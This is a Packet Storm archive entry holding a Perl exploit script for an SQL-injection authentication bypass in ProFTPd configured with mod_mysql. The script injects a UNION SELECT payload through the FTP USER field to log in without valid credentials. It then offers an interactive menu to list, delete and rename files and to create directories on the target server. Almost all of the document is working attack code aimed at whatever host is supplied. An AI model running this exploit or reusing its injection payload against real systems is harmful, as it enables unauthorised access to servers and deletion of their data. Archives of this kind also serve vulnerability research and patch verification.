ProFTPd With mod_mysql Authentication Bypass

2009-02-11T00:00:00
ID PACKETSTORM:74861
Type packetstorm
Reporter AlpHaNiX
Modified 2009-02-11T00:00:00

Description

                                        
                                            `# Credits Go For gat3way For Finding The Bug ! [AT] http://milw0rm.com/exploits/8037  
# Exploited By AlpHaNiX   
# HomePage NullArea.Net  
# Greetz For Zigma-Djekmani-r1z  
  
use Net::FTP;  
  
if (@ARGV < 1 ) { print"\n\n\n[+] Usage : ".  
"\n\n[+] ./exploit.pl ftp.target.net \n\n" ; exit();}  
$host = $ARGV[0];   
system("cls") ;  
print "----------------------------------------------------------\n".  
"[+] ProFTPd with mod_mysql Authentication Bypass Exploit \n".  
"[+] Credits Go For gat3way For Finding The Bug !\n".  
"[+] Exploited By AlpHaNiX \n".  
"[+] NullArea.Net\n".  
"----------------------------------------------------------\n"."\n[!] Attacking $host ..." ;  
$user = "USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --";  
$pass = '1';  
  
$ftp = Net::FTP->new("$host", Debug => 0) or die "[!] Cannot connect to $host";  
$ftp->login("$user","$pass") or die "\n\n[!] Couldn't ByPass The authentication ! ", $ftp->message;  
print "\n[*] Connected To $host";  
  
print "\n[!] Please Choose A Command To Execute On $host :\n" ;  
print "\n\n\n[1] Show Files\n" ;  
print "[2] Delete File\n";  
print "[3] Rename File or Dir\n";  
print "[4] Create A Directory\n";  
print "[5] Exit\n";  
print "Enter Number Of Command Here => " ;  
my $command = <STDIN> ;  
chomp $command ;  
  
if ($command==1){&Show}  
if ($command==2){&Delete}  
if ($command==3){&rename}  
if ($command==4){&create_dir}  
if ($command==5){&EXIT}  
if ($command =! 1||2||3||4||5) {print "\n[!] Not Valid Choise ! Closing..." ;exit()}  
  
sub Show  
{  
print "\n\n\n[!] Please Specify a directory\n";  
my $dir = <STDIN> ;  
chomp $dir ;  
$ftp->cwd($dir) or $newerr=1;   
push @ERRORS, "Can't cd $!\n" if $newerr;  
myerr() if $newerr;  
$ftp->quit if $newerr;  
  
@files=$ftp->dir or $newerr=1;  
push @ERRORS, "Can't get file list $!\n" if $newerr;  
myerr() if $newerr;  
print "Got file list\n";   
foreach(@files) {  
print "$_\n";  
  
}  
exit();  
}  
  
sub Delete  
{  
print "\n\n\n[!] Please Specify a File To Delete\n";  
my $file = <STDIN> ;  
chomp $file ;  
$ftp->delete($file) or die "\n[!] Error while Deleting $file => " , $ftp->message ;  
print "\n[!] $file Deleted !";  
}  
  
sub rename  
{  
print "\n\n\n[!] Please Specify a File To Rename\n";  
my $file = <STDIN> ;  
chomp $file ;  
print "\n[!] Please Specify a New Name For $file\n";  
my $name = <STDIN> ;  
chomp $name ;  
$ftp->rename($file,$name) or die "\n[!] Error while Renaming $file => " , $ftp->message ;  
print "\n[!] $file Renamed to $name !";  
}  
  
  
sub create_dir  
{  
print "\n\n\n[!] Please Specify a Directory Name To create\n";  
my $dir = <STDIN> ;  
chomp $dir ;  
$ftp->mkdir($dir) or die "\n[!] Error while creating $dir => " , $ftp->message ;  
print "\n[!] $dir Created !";  
}  
  
sub EXIT  
{  
system("cls");  
$ftp->quit;  
exit();  
}  
`